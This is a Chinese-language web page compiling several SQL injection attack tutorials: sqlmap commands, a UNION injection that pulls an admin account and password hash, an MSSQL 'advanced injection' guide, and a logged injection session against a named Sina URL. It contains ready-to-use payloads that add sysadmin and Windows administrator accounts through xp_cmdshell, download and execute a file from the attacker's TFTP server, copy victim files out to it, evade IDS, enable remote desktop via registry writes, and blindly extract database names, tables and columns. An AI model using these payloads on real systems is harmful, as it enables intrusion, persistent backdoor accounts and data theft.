python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1” --sql-query “Select host, password FROM mysql.user LIMIT 1, 3” -v 1Select usename, passwd FROM pg_shadow orDER BY usename

保存和恢复会话

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” -b -v 1 -s “sqlmap.log”保存选项到INC配置文件

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” -b -v 1 --save

​

篇3：用Union语句构造注入PHP脚本安全

此文章技术含量不高，。 给菜鸟学习还是很有必要滴~~ 高手看过不要仍砖头就好 ^_^

全文

原文地址： www.tkbbs.com/Article/wlaq/hkgf/10/856.html

参考文章 用Union进行高效注入

事件起因是用 HDSI过程当中 的WEBSHELL管理 有一个网站 显示是 SQL 注入 于是感兴趣的那工具扫 当然 无法 扫到管理帐号 工具无效。。 哈哈 于是开始手工注射

注射地址为 ：www.XXX.net/read.php?type=news&id=29

www.xxxx.net/read.php?type=news&id=29/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,6,7/**/from/**/admin

上面的字符的意思是 查询 ADMIN表的字段数目 可以逐个增加 最终页面 不在提示出错 可以看到 页面出现了 2 4 和作者后面的3

说明程序调用了这几个字符 如图1

于是把上面的 2 3 4 分别替换成 count(id)：查询有几个管理人员 min(id)：管理人员帐号ID最小值 max(id)：管理人员帐号ID最大值

成为下面的语句

www.xxxx.net/read.php?type=news&id=29/**/and/**/1=2/**/union/**/select/**/1,count(id),min(id),max

(id),5,6,7/**/from/**/admin

如图2

上面的 原来的 2的地方 显示 2 4的地方显示2 3的地方显示1 说明 管理人员ID最大的为2 ID最小的为1 总共两个管理人员

下面查询 他的管理ID叫什么 密码和 ID

username password id

把上面的 2 3 4 分别替换成username password id 这个过程如果没爆出来 可以把 这几个字段换成其他的尝试

www.xxxx.net/read.php?type=news&id=29/**/and/**/1=2/**/union/**/select/**/1,username,password,1,5,6,7/**/from/**/admin

或 www.xxxx.net/read.php?type=news&id=29/**/and/**/1=2/**/union/**/select/**/1,username,password,2,5,6,7/**/from/**/admin

如图3

看见了吗 管理者 ID 为1 帐号为 wnjy 密码是 $1$BX$/.kw1RvBf/Un7c9heGMPb0

好了 本文到此就结束了 希望广大菜鸟朋友们有所领悟 另外 动力系统的 3.51前 好象也有这种漏洞 构造语句的方法大致相同~  BY 风雪残士

篇4：桂林老兵的Sqlserver高级注入技巧脚本安全

现在将老兵本人多年的SQLSERVER注入高级技巧奉献给支持老兵的朋友：

前言：

即是高级技巧，其它基本的注入方法就不详述了，

看不懂可查本站的注入基础文章。

为了更好的用好注入，建议大家看看本站的SQL语法相关文章

[获取全部数据库名]

select name from master.dbo.sysdatabases where dbid=7 //dbid的值为7以上都是用户数据库

[获得数据表名][将字段值更新为表名，再想法读出这个字段的值就可得到表名]

select top 1 name from 数据库名.dbo.sysobjects where xtype='u' and status>0 and name not in('table')

[获得数据表字段名][将字段值更新为字段名，再想法读出这个字段的值就可得到字段名]

select top 1 数据库名.dbo.col_name(object_id('要查询的数据表名'),字段列如:1) [ where 条件]

通过SQLSERVER注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组]

news.asp?id=2;exec master.dbo.sp_addlogin test,test;-- //添加数据库用户用户test,密码为test

news.asp?id=2;exec master.dbo.sp_password test,123456,test;-- //如果想改密码，则用这句（将test的密码改为123456）

news.asp?id=2;exec master.dbo.sp_addsrvrolemember test,sysadmin;-- //将test加到sysadmin组,这个组的成员可执行任何操作

news.asp?id=2;exec master.dbo.xp_cmdshell 'net user test test /add';-- //添加系统用户test,密码为test

news.asp?id=2;exec master.dbo.xp_cmdshell 'net localgroup administrators test /add';-- //将系统用户test提升为管理员

这样，你在他的数据库和系统内都留下了test管理员账号了

下面是如何从你的服器下载文件file.exe后运行它[前提是你必须将你的电脑设为TFTP服务器，将69端口打开]

id=2; exec master.dbo.xp_cmdshell 'tftp Ci 你的IP get file.exe';--

然后运行这个文件：

id=2; exec master.dbo.xp_cmdshell 'file.exe';--

下载服务器的文件file2.doc到本地TFTP服务器[文件必须存在]:

id=2; exec master.dbo.xp_cmdshell 'tftp Ci 你的IP Put file2.doc';--

绕过IDS的检测[使用变量]

declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'

declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'

新加的:

建一个表，

只有一个字段，类型为image,将asp内容写入。导出数据库为文件

backup database dbname to disk='d:\web\db.asp';

报错得到系统操作系统和数据库系统版本号

id=2 and 1(select @@VERSION);

篇5：hdsi2.0 sql注入部分抓包分析语句脚本安全

恢复cmd

;insert tb1 exec master..xp_cmdshell'net user '--

;exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'--

执行命令：

sql: ;ipconfig -all--

dos：

;Drop table comd_list ;CREATE TABLE comd_list (ComResult nvarchar(1000)) INSERT comd_list EXEC MASTER..xp_cmdshell

“ipconfig

-all”--

GET /plaza/event/new/crnt_event_view.asp?event_id=57

And (Select char(94)+Cast(Count(1) as varchar(8000))+char(94) From [comd_list] Where 1=1)>0

列目录：

c: jiaozhu 临时表

;drop table jiaozhu;CREATE TABLE jiaozhu(DirName VARCHAR(100), DirAtt VARCHAR(100),DirFile VARCHAR(100)) INSERT jiaozhu

EXEC

MASTER..XP_dirtree “c:”,1,1--

GET /plaza/event/new/crnt_event_view.asp?event_id=57

And (Select char(94)+Cast(Count(1) as varchar(8000))+char(94) From [jiaozhu] Where 1=1)>0

上传文件：

本地路径：C:\Inetpub\wwwroot\cook.txt 保存位置：c：

数据库存储过程：

;exec master..xp_cmdshell ' echo

cdb_sid=3UrzOV;%20cdb_cookietime=2592000;%20cdb_auth=VgcCBAJbVQxVAVMCVghTBFJUUQYDBQdTV1BWVQoKAQE6PwNX;%

20cdb_visitedfid=12;%2

0cdb_oldtopics=D8D>c:\'--

数据库备份：(上传后删除临时表)

;Drop table [xiaopan];create table [dbo].[xiaopan] ([cmd] [text])--

;insert into xiaopan(cmd) values(' echoStr ')--

;declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s='c:/' backup database @a to disk=@s WITH

DIFFERENTIAL,FORMAT--

;Drop table [xiaopan]--

开启3389：

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite

@r,'software\microsoft\windows\currentversion\netcache','enable','reg_sz','0';-

---

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite @r,'software\microsoft\windows

nt\currentversion\winlogon','shutdownwithoutlogon','reg_sz','0';----

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite

@r,'software\policies\microsoft\windows\installer','enableadmintsremote','reg_dword',1;----

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite @r,'system\currentcontrolset\control

\terminal

servert','senabled','reg_dword',1;----

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite

@r,'system\currentcontrolset\services\termdd','start','reg_dword',2;----

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite

@r,'system\currentcontrolset\services\termservice','start','reg_dword',2;----

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite 'hkey_users','.default\keyboard

layout\toggle','hotkey','reg_sz','1';----

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_cmdshell 'iisreset /reboot';----

注入分析：数字型 SQL错误提示关闭 开启 access

使用关键字 宝石公园“你玩 我抽”中奖名单公布

igame.sina.com.cn/plaza/event/new/crnt_event_view.asp?event_id=57

多句查询 支持

子查询 支持

权限 public

当前用户 dbo

当前库 event

;create table t_jiaozhu(jiaozhu varchar(200))

And 1=1

And 1=2

And (Select Count(1) from SYSObjects)>0

and (select len(user))<32

;declare @a int--

And (IS_SRVROLEMEMBER('sysadmin'))=1

And (IS_MEMBER('db_owner'))=1

and (select len(user))<16

and (select len(user))<4

and (select len(user))<2

and (select len(user))<3

and (select len(user))<3

and (select len(user))<4

and (select ascii(substring(user,1,1)))<80

and (select ascii(substring(user,2,1)))<80

and (select ascii(substring(user,3,1)))<80

and (select ascii(substring(user,1,1)))<104

and (select ascii(substring(user,2,1)))<104

and (select ascii(substring(user,3,1)))<104

and (select ascii(substring(user,1,1)))<92

and (select ascii(substring(user,2,1)))<92

and (select ascii(substring(user,3,1)))<116

and (select ascii(substring(user,1,1)))<98

...

...

...

and (select len(db_name()))<16

and (select len(db_name()))<8

and (select len(db_name()))<4

...

...

...

and (select ascii(substring(db_name(),1,1)))<80

and (select ascii(substring(db_name(),2,1)))<80

and (select ascii(substring(db_name(),5,1)))<85

跨库：

猜解数据库：

GET

and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <8

and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <4

and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <6

and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <7

...

...

...

and (Select top 1 ascii(substring(name,2,1)) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by

dbid

desc) <104

and (Select top 1 ascii(substring(name,3,1)) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by

dbid

desc) <104

...

...

...

and (Select top 1 len(name) from (Select top 4 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <5

master 不是sa权限，不能跨库

猜解表名：

EventCategory

GET

and (Select top 1 unicode(substring(name,2,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char(85))

T

order by id desc) < 80

and (Select top 1 unicode(substring(name,11,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char

(85)) T

order by id desc) < 80

and (Select top 1 unicode(substring(name,12,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char

(85)) T

order by id desc) < 80

and (Select top 1 unicode(substring(name,6,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char(85))

T

order by id desc) < 80

猜解列名：

GET

and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<32

and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<48

and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<56

and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<60

and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<62

and (select top 1 len(name) from ( select top 1 A.id,A.name from EVENT..syscolumns A,EVENT..sysobjects B where

A.id=B.id and

B.name='EventCategory' order by A.name desc) T order by name asc )<35

【自定义sqlmap注入语句进行高级注入脚本安全】相关文章：

1.sqlmap 注入命令脚本安全

2.注入笔记半猜解查询脚本安全

3.手把手叫你SQL注入攻防（PHP语法）脚本安全

4.百度的JS数据流注入型跨站脚本安全

5.《将心注入》读书笔记

6.让思考注入生活散文

7.教你飞速学会手工注入

8.实例讲解如何注入肉鸡

9.好孩子育儿网多处注入及修复方案

10.注入杯具的年度个性搞笑签名